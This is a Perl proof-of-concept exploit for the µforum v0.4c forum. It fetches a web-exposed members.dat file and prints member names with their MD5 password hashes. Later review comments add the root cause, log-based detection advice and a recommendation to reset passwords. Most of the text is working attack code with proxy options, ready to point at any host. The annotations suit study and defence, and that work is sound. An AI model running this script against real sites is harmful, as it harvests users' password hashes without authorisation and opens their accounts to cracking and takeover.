
µforum v0.4c (members.dat) MD5 Password Hash Disclosure PoC



#!/usr/bin/perl=0D
#
# Affected.scr..: µforum v0.4c
# Poc.ID........: 08060901
# Type..........: Members' passwords are stored in a .dat file not protected by a .htaccess file
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: comscripts.com/scripts/php.forum.1568.html
# Poc.link......: acid-root.new.fr/poc/08060901.txt
# Credits.......: DarkFig
#
# NOTE(review): the "=0D" at the end of most lines and the "=B5" inside the
# banner string are quoted-printable residue (a carriage return and the micro
# sign) left by the archive; they are not part of the original Perl source.
#
# Summary: the script issues one HTTP GET for <host><path>membres/members.dat
# and prints "name::token" pairs parsed out of the response body. It relies on
# nothing beyond the data file being served to anonymous clients.
#
# Defender notes:
#   * Root cause (per the "Type" field above): the member data file sits under
#     the web root with no access control. Since the vendor status is listed
#     as Unpatched, the mitigation is deployment-side: deny HTTP access to the
#     file or store it outside the document root.
#   * Detection: look for GET requests to .../membres/members.dat in the web
#     server access log, especially ones answered with a 200. The User-Agent
#     set below ("Mozilla") is a weak indicator on its own.
#   * If the file was reachable, treat the stored hashes as disclosed and
#     force password resets. The advisory title calls them MD5 hashes; whether
#     they are salted cannot be told from this page.
use LWP::UserAgent;=0D
use HTTP::Request;=0D
use Getopt::Long;=0D
use strict;=0D
=0D
# Banner printed on every run.
print STDOUT "\n+", '-' x 36, "+\n";=0D
print STDOUT "| =B5forum v0.4c (members.dat) Exploit |\n";=0D
print STDOUT '+', '-' x 36, "+\n";=0D
=0D
# Command-line options: site host, forum path, and optional HTTP proxy
# URL / user / password. NOTE(review): the GetOptions return value ($opt) is
# never checked, and a missing --host is not rejected.
my($host,$path,$proxh,$proxu,$proxp);=0D
my $opt = GetOptions(=0D
   'host=s'   =>  \$host,=0D
   'path=s'   =>  \$path,=0D
   'proxh=s'  =>  \$proxh,=0D
   'proxu=s'  =>  \$proxu,=0D
   'proxp=s'  =>  \$proxp);=0D
=0D
# Build the request URL: default path "/", append the fixed data-file
# location, and prepend "http://" unless the string already contains "http"
# (the match is unanchored, so "http" anywhere in the string suppresses it).
if(!$path) {$path = '/';}=0D
$host .= $path.'membres/members.dat';=0D
if($host !~ /http/) {$host = 'http://'.$host;}=0D 
=0D
# HTTP client: fixed User-Agent string, 30-second timeout, optional proxy.
my $ua = LWP::UserAgent->new();=0D
   $ua->agent('Mozilla');=0D
   $ua->timeout(30);=0D
   $ua->proxy(['http'] => $proxh) if $proxh;=0D
=0D
# Plain GET for the data file; proxy Basic credentials are attached only
# when a proxy password was supplied.
my $req = HTTP::Request->new('GET', $host);=0D
   $req->proxy_authorization_basic($proxu, $proxp) if $proxp;=0D
=0D
# NOTE(review): the response status is not checked, so an error page body is
# parsed the same way as the data file; output alone does not prove exposure.
my $res = $ua->request($req);=0D
my $dat = $res->content;=0D
# The body is split on ':' and each piece is matched against two patterns.
# Presumably the file holds PHP serialize() output (quoted strings followed
# by ";a" / ";i" type markers) -- confirm against the forum source.
my @tabl= split(/:/, $dat);=0D
=0D
foreach (@tabl) {=0D
      # A quoted string followed by ";a" starts a new output line: "<text>::".
      if($_ =~ /"(.*)";a/){=0D
            print "\n".$1.'::';}=0D
=0D
      # A quoted 32-character [a-z0-9] token followed by ";i" is printed as
      # the hash. The class is wider than hex, so this is a shape check only.
      if($_ =~ /"([a-z0-9]{32})";i/){=0D
            print $1;}=0D
}=0D
=0D
print "\n";=0D
exit(0);
